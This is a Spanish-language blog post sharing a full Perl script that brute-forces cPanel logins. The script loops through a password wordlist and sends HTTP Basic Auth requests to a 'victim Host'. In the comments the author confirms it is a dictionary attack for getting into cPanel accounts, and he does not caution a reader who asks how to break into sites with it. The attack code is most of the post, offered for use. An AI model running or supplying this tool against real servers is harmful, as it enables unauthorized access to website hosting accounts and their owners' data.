Cpanel Password Brute Forcer

Aquí les dejo una herramienta, el nombre lo dice todo. Esta hecha en Perl:

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
#    (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host     = $ARGV[0];
$user     = $ARGV[1];
$port     = $ARGV[2];
$list     = $ARGV[3];
$file     = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
#               Cpanel Password Brute Force Tool              #
###############################################################
#     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
#-------------------------------------------------------------#
#    [Host] : victim Host             (simorgh-ev.com)        #
#    [User] : User Name               (demo)                  #
#    [PORT] : Port of Cpanel          (2082)                  #
#[list] : File Of password list   (list.txt)              #
#    [File] : file for save password  (password.txt)          #
#                                                             #
###############################################################
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);exit;}

headx();

$numstart  = "-1";

sub headx() {
print q(
###############################################################
#              Cpanel Password Brute Force Tool               #
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read  $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}

  5 Comentarios

  1. Neutron   •  

    Probandolo xD Haber como va…:D

    Saludos muy buen script!!!

  2. Brian Urban   •     Autor

    Efectivamente es para acceder a un Cpanel usando ataque por diccionario, hay que tener instalado Perl para ejecutarlo. Los parámetros de uso aparecen al ejecutar la herramienta.

  3. ale   •  

    Hola, como hay que usarlo, sirve para enrar a los cpanel de algun sitio web??? Gracias.

  4. Brian Urban   •     Autor


    Miroslav:

    Hola Brian:

    Como estas..veo que tienes conocimiento de lo que es Cpanel, quisiera hacerte una consulta acerca de mi blog hecho en cpanel (hasta ahoranadie pudo responderme). MIra logré concluirla pero al colocar en el navegador la direccion http://bit.ly/9TxcPs, me sale el plugin o formulario para administrar el blog en la parte superior izquierda, cosa que no deberia ocurrir, si tu supieras, podrias explicarme como eliminar ese formulario que sale por defecto para que el blog salga limpio ?Agradecria tu respuesta..Mil Gracias

    Hola Miroslav, primero que todo hay que aclarar que Cpanel es una herramienta para administrar los servicios de una web de una manera sencilla, por lo que no es un CMS para administrar blogs como lo es WordPress. Según veo tu blog esta hecho en “Serendipity” así que puedes encontrar ayuda en la documentación oficial que puedes encontrar en http://www.s9y.org/38.html
    Saludos.

  5. Miroslav   •  

    Hola Brian:

    Como estas..veo que tienes conocimiento de lo que es Cpanel, quisiera hacerte una consulta acerca de mi blog hecho en cpanel (hasta ahoranadie pudo responderme). MIra logré concluirla pero al colocar en el navegador la direccion http://bit.ly/9TxcPs, me sale el plugin o formulario para administrar el blog en la parte superior izquierda, cosa que no deberia ocurrir, si tu supieras, podrias explicarme como eliminar ese formulario que sale por defecto para que el blog salga limpio ?Agradecria tu respuesta..Mil Gracias

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *